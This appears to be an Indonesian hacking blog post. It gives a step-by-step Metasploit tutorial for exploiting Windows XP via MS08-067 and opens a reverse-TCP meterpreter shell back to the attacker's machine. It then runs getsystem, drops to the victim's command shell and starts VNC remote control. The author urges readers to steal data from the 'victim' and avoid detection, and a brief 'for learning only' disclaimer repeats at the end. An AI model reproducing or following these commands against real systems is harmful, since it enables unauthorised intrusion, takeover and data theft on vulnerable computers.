Setelah muka kaya orang belum makan 2 hari, rambut kaya grandong karena kecapean ane putusin buat tidur. Dan setelah bangun dari tidur yang nimat tadi, akhirnya kembali lagi dah muka ganteng ane. Hahaha... Dirumah jenuh nggak ada kerjaan lebih baik ngeblog aja iseng share ilmu siapa tahu bermanfaat buat agan-agan pembaca. Post kali ini akan ane share tutorial buat exploit windows XP yang udah mau kiamat. Exploit yang saya share ini menggunakan metasploit, tools dewa yang udah ada dalam om naga.
Sekarang waktunya praktek. Simak sendiri terus pratekin aja bro.
Buka terminal terus buka metasploit agan.
root@kurawa:~# msfconsole
Tunggu gan sabar, agak lama emang kalo buka metasploit. Nah nongol tuh punya ane.
Terus gunakan exploit ini gan
msf > use exploit/windows/smb/ms08_067_netapi
Sekarang set payload nya. Pake ini gan.
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Exploit dan Payload udah diset sekarang kita liat opsi apa yang harus diisi.
msf exploit(ms08_067_netapi) > show options
Keluar tuh opsi-opsi yang harus diisi. Keterangan buat ngisinya kaya gini
RHOST - isi dengan IP target
RPORT - isi dengan port target
LHOST - isi dengan IP kita
LPORT - isi dengan port kita
Jadi nanti kaya penampakan dibawah ini
Kalo standardnya RPORT 445 dan LPORT 4444. Ane gunain standar bawaannya aja. Kalo udah diisi semua sekarang tinggal eksekusi target wedus XP.
msf exploit(ms08_067_netapi) > exploit
Mantap!! Langsung tembus (ditandai dengan munculnya session meterpreter).
Sekarang kita ambil alih system target yang udah berubah status jadi korban. Hahaha.. Ane susul dengan command buat liat siapa kita. Ane juga liat dimana posisi ane.
meterpreter > getsystem
meterpreter > getuid
meterpreter > pwd
Posisi ane udah di system 32 korban. Sekarang ane mau masuk ke shell milik korban.
meterpreter > shell
Bless... masuk dah di cmd korban
Terserah ente mau diapain tuh kompi korban, mau shut down, remote dekstop atau sekedar jalan-jalan buat liat isi file korban, atau bahkan nyolong data terserah agan. Anggap aja itu mesin punya agan. Hahaha...Ane udah bilang diatas terserah agan mau diapain ( mau shut down, remote dekstop atau sekedar jalan-jalan buat liat isi file korban, atau bahkan nyolong data ). Tapi ane yakin ente bakal paling ngebet buat ngincer yang satu ini 'REMOTE DESKTOP'.
meterpreter > run vnc
Mantap jilid 2, langsung ke remote mesin korban.
Pesan ane satu pasang muka bego agan biar kagak ketahuan. Hahaha..
Sekian post kali ini semoga bermanfaat. Ini cuma sebagai pembelajaran saja, ane nggak tanggung jawab kalo ada apa-apa. Kembali pada diri agan. Salam.
Sekian post kali ini semoga bermanfaat. Ini cuma sebagai pembelajaran saja, ane nggak tanggung jawab kalo ada apa-apa. Kembali pada diri agan. Salam.
0 comments:
Post a Comment